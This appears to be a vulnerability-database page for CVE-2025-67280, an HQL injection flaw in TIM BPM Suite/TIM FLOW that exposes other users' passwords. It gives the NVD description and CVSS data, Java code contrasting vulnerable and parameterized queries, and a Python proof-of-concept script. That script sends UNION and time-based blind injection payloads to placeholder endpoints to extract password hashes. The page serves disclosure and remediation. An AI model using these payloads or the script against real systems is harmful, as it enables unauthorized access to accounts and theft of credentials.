Security Vulnerability Report
CVE-2025-67280 CVSS 5.4 MEDIUM

CVE-2025-67280

Published: 2026-01-09 16:16:07
Last Modified: 2026-01-22 21:33:33

Description

In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Hibernate Query Language injection vulnerabilities exist which allow a low privileged user to extract passwords of other users and access sensitive data of another user.

Weakness (from the NVD record): CWE-564, SQL Injection: Hibernate. Exploitation needs only an authenticated low-privileged account (PR:L in the vector) and no user interaction; the two outcomes named in the description, reading other users' passwords and reading another user's data, correspond to the confidentiality and integrity impacts in the score.
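
The pattern behind a Hibernate Query Language injection, as an added illustration that is not code from TIM Solutions or from the referenced advisory: an HQL string assembled by concatenating a caller-supplied search term, beside the parameterized form that closes the hole. The `User` entity, its field names, the tenant column and the `UserSearch` class are assumptions made for this example; the real TIM query text and injection points are not published on this page.

```java
import java.util.List;

import jakarta.persistence.Entity;
import jakarta.persistence.Id;
import org.hibernate.Session;
import org.hibernate.query.Query;

// Stand-in entity (assumption: the real TIM entity and column names are not
// on this page). jakarta.persistence matches Hibernate 6; on Hibernate 5 the
// same annotations live in javax.persistence.
@Entity
class User {
    @Id Long id;
    String tenantId;
    String username;
    String passwordHash;
}

public class UserSearch {

    // VULNERABLE (CWE-564). The caller's search term is spliced into the HQL
    // text. A term of   ' or u.username like '   turns the clause into
    //   u.username like '%' or u.username like '%'
    // which matches every row, and the loaded entities carry passwordHash
    // with them: exactly the "extract passwords of other users" outcome.
    static List<User> searchVulnerable(Session session, String term) {
        String hql = "from User u where u.username like '%" + term + "%'";
        return session.createQuery(hql, User.class).getResultList();
    }

    // HARDENED. Three changes, each closing one part of the advisory:
    //  1. named parameter: the term is bound through JDBC, so quotes in it are
    //     data rather than query syntax;
    //  2. tenant filter bound from the authenticated session, never from
    //     request input, so a low-privileged user cannot reach another
    //     user's rows even with a well-formed query;
    //  3. projection of only the field the caller needs, so the password hash
    //     never leaves the persistence layer even when a row is matched.
    static List<String> searchSafe(Session session, String callerTenant, String term) {
        Query<String> q = session.createQuery(
            "select u.username from User u"
            + " where u.tenantId = :tenant"
            + " and u.username like :pattern escape '!'",
            String.class);
        q.setParameter("tenant", callerTenant);
        q.setParameter("pattern", "%" + escapeLike(term) + "%");
        return q.getResultList();
    }

    // Binding stops injection but not LIKE-wildcard abuse (a bare '%' still
    // matches everything). Neutralise '%' and '_' with the escape character
    // declared in the query so the term is matched literally.
    static String escapeLike(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }
}
```

Both methods run against any Hibernate 5.2+ or 6 `Session`. When reviewing a codebase for this class of bug, grep for `createQuery(` whose argument is built with `+` or `String.format` and for `createNativeQuery(` with the same shape; every hit should become a `:named` parameter, and every query that returns a whole entity to a serialization layer should be checked for fields, such as a password hash, that the caller has no business seeing.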

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N (network-reachable, low complexity, low privileges required, no user interaction, scope unchanged, low confidentiality and integrity impact, no availability impact; this is the secondary metric carried in the NVD record, see Raw JSON Data below)

Configurations (Affected Products)

cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding 9.1.2)
TIM BPM Suite < 9.1.2
TIM FLOW < 9.1.2
Note: the NVD description says "through 9.1.2", which reads as inclusive, while the CPE match treats 9.1.2 as the first unaffected version. Before closing a finding on a 9.1.2 installation, confirm the fixed build against the vendor release notes linked under References.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67280 PoC - HQL Injection in TIM BPM Suite/TIM FLOW
# This PoC demonstrates how a low-privileged user can exploit HQL injection
# to extract password hashes of other users
#
# Editorial note: the host, endpoint paths, parameter names and query shape
# below are placeholders; this page does not publish the real injection
# points (see the Y-Security advisory under References). The payloads are
# SQL-style illustrations and must be adapted to the application's actual HQL.
import json
import sys
import time

import requests

TARGET_URL = "https://vulnerable-tim-server.com"
LOGIN_URL = f"{TARGET_URL}/api/auth/login"
INJECT_ENDPOINT = f"{TARGET_URL}/api/search/users"


def login(username, password):
    """Authenticate with low-privileged account"""
    session = requests.Session()
    payload = {"username": username, "password": password}
    response = session.post(LOGIN_URL, json=payload)
    if response.status_code == 200:
        return session
    return None


def exploit_hql_injection(session):
    """Execute HQL injection to extract password hashes"""
    # Malicious HQL payload to extract user passwords
    # This payload attempts to modify the query logic to bypass restrictions
    malicious_input = "admin' UNION SELECT password FROM users WHERE '1'='1"
    params = {"searchTerm": malicious_input, "filter": "all_users"}
    headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
    }
    response = session.get(INJECT_ENDPOINT, params=params, headers=headers)
    if response.status_code == 200:
        data = response.json()
        print(f"[+] Successfully extracted data: {json.dumps(data, indent=2)}")
        return data
    print(f"[-] Exploitation failed: {response.status_code}")
    return None


def extract_all_passwords(session):
    """Extract all user passwords using blind HQL injection"""
    passwords = []
    for user_id in range(1, 100):
        # Time-based blind injection to extract passwords character by character.
        # The delay is measured with time.time() (the original used the
        # non-existent requests.time); timeout stays above the 5 s delay so a
        # fired SLEEP is observed as a slow response rather than an exception.
        payload = (
            "' AND (SELECT CASE WHEN SUBSTR((SELECT password FROM users "
            f"WHERE id={user_id}),1,1)='a' THEN SLEEP(5) ELSE 0 END) AND '1'='1"
        )
        params = {"searchTerm": payload}
        start_time = time.time()
        response = session.get(INJECT_ENDPOINT, params=params, timeout=10)
        elapsed = time.time() - start_time
        if elapsed >= 5:
            print(f"[+] Character found for user {user_id}")
            # Continue extracting full password...
    return passwords


if __name__ == "__main__":
    # Step 1: Login with low-privileged account
    session = login("low_priv_user", "password123")
    if not session:
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Successfully authenticated with low-privileged account")
    # Step 2: Exploit HQL injection vulnerability
    exploit_hql_injection(session)

References

https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes (vendor release notes)
https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ (third-party advisory, Y-Security)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67280", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:07.397", "lastModified": "2026-01-22T21:33:32.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Hibernate Query Language injection vulnerabilities exist which allow a low privileged user to extract passwords of other users and access sensitive data of another user."}, {"lang": "es", "value": "En TIM BPM Suite/ TIM FLOW hasta la versión 9.1.2 existen múltiples vulnerabilidades de inyección de Hibernate Query Language que permiten a un usuario con bajos privilegios extraer contraseñas de otros usuarios y acceder a datos sensibles de otro usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-564"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.2", "matchCriteriaId": "071D6670-88DB-4539-A1F9-1850251BDD53"}]}]}], "references": [{"url": "https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}